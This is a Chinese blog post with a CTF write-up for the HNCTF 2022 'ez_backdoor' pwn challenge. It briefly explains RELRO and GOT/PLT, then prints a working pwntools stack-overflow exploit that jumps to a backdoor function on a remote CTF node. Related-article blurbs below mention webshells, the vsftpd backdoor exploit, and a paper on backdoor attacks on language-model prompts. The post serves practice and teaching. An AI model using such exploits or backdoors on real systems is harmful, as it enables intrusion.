[HNCTF 2022 WEEK2]ez_backdoor

已于 2023-11-27 21:26:12 修改
阅读量304 收藏
点赞数 7
分类专栏: PWN 文章标签: python
于 2023-11-27 21:13:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76466003/article/details/134654436
版权

开启栈地址随机化

RELRO(ReLocation Read-Only):

分为两种情况,第一种情况是Partial RELRO,这种情况是部分开启堆栈地址随机化,got表可写,第二种,Full RELRO是全部开启,got表不可写,Got表是全局偏移表,里面包含的是外部定义的符号相应的条目的数据段中,PLT表,是过程链接表/内部函数表,linux延迟绑定,但是最后还是要连接到Got,PLT表只是为一个过渡的作用。



 

from pwn import *

i = remote("node5.anna.nssctf.cn",28141)
pwnfile= './00'
elf = ELF(pwnfile)
add = elf.sym["backdoor"]

ret = 0x40101a
payload  = b'a'*(0x100+8)+p64(ret)+p64(add)
i.sendline(payload)
i.interactive()

payload  = b'a'*(0x100+8)+p64(ret)+p64(add)

payload为什么要加ret的地址?

返回主函数在调用backdoor的地址

沈理大学牲
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ident_backdoor2.nasl
11-08
ident_backdoor2
wso2.5.1.rar_Everything and More_backdoor
09-22
WSO is a PHP shell backdoor that provide an interface for various remote operations. It can perform everything from remote code execution, bruteforcing of servers, provide server information, and more...
[HNCTF 2022 Week2]
qq_49341576的博客
04-26 700
[HNCTF 2022 Week2]
msf利用Metasploitable 2 漏洞之6667端口之unreal_ircd_3281_backdoor
crowsec
05-05 5430
Metasploitable漏洞演练系统 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,这方便大家对于msf的学,以下以6667端口的unreal_ircd_3281_backdoor进行攻击。可以在虚拟机中启动(登录密码和账号都是msfadmin)查看其ip:    ifconfig地址为:192.168.127.145然后在kali linux中进...
FTP服务后门利用 - vsftpd_234_backdoor(笑脸漏洞)
星虐
02-03 2921
vsftpd_234_backdoor(笑脸漏洞) 攻击机和受害机的IP kali: 192.168.75.130 Metasploitable2 - Linux: 192.168.75.128 方法一: 1.测试其流通性 2. 扫描受害机的服务信息 3. ftp连接受害机,用户名加上笑脸符号 :) 密码任意 注意(在输入密码回车后会有停顿,记住不要关闭ftp连接) 4. 此时扫描到受害机会反弹一个6200端口 5.使用 nc 连接会发现是root权限 笑脸漏洞利用成功.
Vsftpd2.3.4-端口渗透 6200 irc_3281_backdoor
旺仔Sec&blog
07-24 303
Vsftpd2.3.4-笑脸注入
uvm_reg_backdoor——寄存器模型(十)
weixin_34067102的博客
12-11 871
寄存器有前门和后门两种访问方式,这儿只看后门访问方式 //------------------------------------------------------------------------------ // Class: uvm_reg_backdoor // // Base class for user-defined back-door register and...
Newstar Ctf 2022| week2 wp
fevergun的博客
11-07 1322
Newstar CTF 2022 week2
2022_NIPS_BadPrompt: Backdoor Attacks on Continuous Prompts
Gloria_ruc的博客
06-01 1315
基于提示学习的范式关注度比较高,同时取得了比较好的效果。但是很少有研究探索基于提示的模型在指导下游任务时的安全问题。本文提出了通过后门攻击来探索连续提示学习算法的脆弱性。由于已有的后门攻击都不能很好的应用于少样本场景下的连续提示模型。于是本文提出了BadPrompt,一个轻量级并且任务自适应的算法对连续提示进行攻击。首先,BadPrompt要生成候选触发器,这些候选触发器指示预测目标标签并且要和非目标标签样本不同。然后,要能自动的为每个样本选择更有效并且更不可见的触发器。实验略。
ctf_backdoor
dengzhasong7076的博客
12-05 821
最近是想写一个ctf线下赛的总结,不过想想还是算了,然后突发想到一个能用上的一个backdoor web容器:apache .htaccess <Files .index.html> ForceType application/x-httpd-php SetHandler application/x-httpd-php </Files> DirectoryInd...
[SWPUCTF 2022 新生赛] 刷题记录
rev1ve的博客
08-12 747
SWPUCTF 2022 新生赛 若调用类中的静态方法,则需要传递一个数组作为第一个参数。数组的第一个元素是类名,第二个元素是要调用的静态方法名。F12,web开发者都被办了,尝试查看源代码,得到。跟第二关相比变成了强等于,直接数组绕过。打开题目,发现加到19就会变成-20。很明显是使用sql注入中的万能密码。一看就是base64加密,直接解码。打开题目,第一关提示在http头。分析一下,提示POST传参,出现。分析一下,进行反序列化时,会让。然后执行函数,且参数值为。绕过后,得到第三关源代码。
builtin_hack_backdoor_
09-30
backdoor for netgear routers. Can use to hack everyone
Shells_shell_backdoor_ShellChecker_
10-02
BHH Shell Checker VULNERABILITY OF SITES
SeayFindShell( linux-python-killwebshell.zip_backdoor_cleariwf_m
09-15
SeayFindShell( linux下python版webshell(web后门)查杀工具)
GLM+vLLM 部署调用
qq_38915354的博客
06-13 1155
vLLM 框架是一个高效的大型语言模型(LLM)推理和部署服务系统
找出Python潜在的编程问题
svygh123的专栏
06-13 1064
Pylint 是一个非常强大的静态代码分析工具,主要用于检查 Python 代码的语法错误、代码风格问题以及潜在的编程错误。它是 Open Source Initiative 认证的开源软件,由 Logilab 团队开发维护。
第9章 类
最新发布
我走的每一步都算数
06-17 720
让一个类继承另一个类后,就可以添加区分子类和父类所需的新属性和新方法了。class Car:class ElectricCar(Car): # 继承Carself.battery = 85 # 新属性mycar = ElectricCar(2024, 'Au', 'A7') # 创建实例mycar.prt_battery() # 新方法熟悉Python 提供的选项,这样才能确定哪种组织方式是最佳的,并能理解别人开发的项目。
python迁移数据教程
2402_85292291的博客
06-13 698
if os.path.isfile(src_item_path): dest_item_path = os.path.join(dest_folder, item) shutil.copy2(src_item_path, dest_item_path) # 如果item是目录,递归调用migrate_data函数。2. 准备源文件夹和目标文件夹: 在您的计算机上创建两个文件夹,分别为源文件夹(source_folder)和目标文件夹(destination_folder)。将您希望迁移的数据放入源文件夹。
UVM_BACKDOOR是什么
12-05
根据提供的引用内容,没有直接回答UVM_BACKDOOR是什么的信息。但是,可以根据引用内容提供一些相关信息。 引用中提到了uvm_bitstream_t,这是UVM中的一种数据类型,用于在UVM组件之间传递数据。而UVM_BACKDOOR是UVM中的一种机制,可以在不破坏封装性的情况下,访问UVM组件中的内部数据。因此,可以将UVM_BACKDOOR看作是一种使用uvm_bitstream_t数据类型在UVM组件之间传递数据的方法。 另外,引用中提到了uvm_config_db可以传递不同类型的参数,但是并没有提到UVM_BACKDOOR。 综上所述,UVM_BACKDOOR是一种使用uvm_bitstream_t数据类型在UVM组件之间传递数据的方法,可以在不破坏封装性的情况下,访问UVM组件中的内部数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值